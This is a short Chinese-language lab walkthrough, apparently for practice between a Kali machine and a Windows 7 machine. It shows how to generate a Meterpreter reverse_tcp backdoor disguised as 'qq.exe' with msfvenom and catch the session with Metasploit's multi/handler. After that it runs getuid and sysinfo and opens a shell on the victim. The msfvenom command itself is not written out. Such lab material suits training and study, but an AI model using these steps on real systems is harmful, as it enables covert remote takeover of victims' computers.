kali x64:192.168.26.136
win7 x86: 192.168.26.128
先在kali终端输入msfvenom -l,打开payload目录
然后找到payload windows/meterpreter/reverse_tcp
输入以下命令生成后门 qq.exe然后将生成的qq.exe移到win7中,然后打开msfconsole
使用该攻击模块监听 use exploit/multi/handler
然后设置 payload
show options 查看选项
设置 LHOST 为 kali 地址然后run开始监听
这时我们打开win7的qq.exe文件
就能看到 Kali 这边获取到一个 Session
输入jobs退出,继续输入sessions -l查看session列表
这里有一个session列表,sessionid为1
我们输入 sessions -i 1, 与该 session 交互
输入getuid查看用户信息
输入systinfo获取系统信息
输入shell即可获取win7的shell
不过用这样方式拿的shell普遍都是很低的,还需提权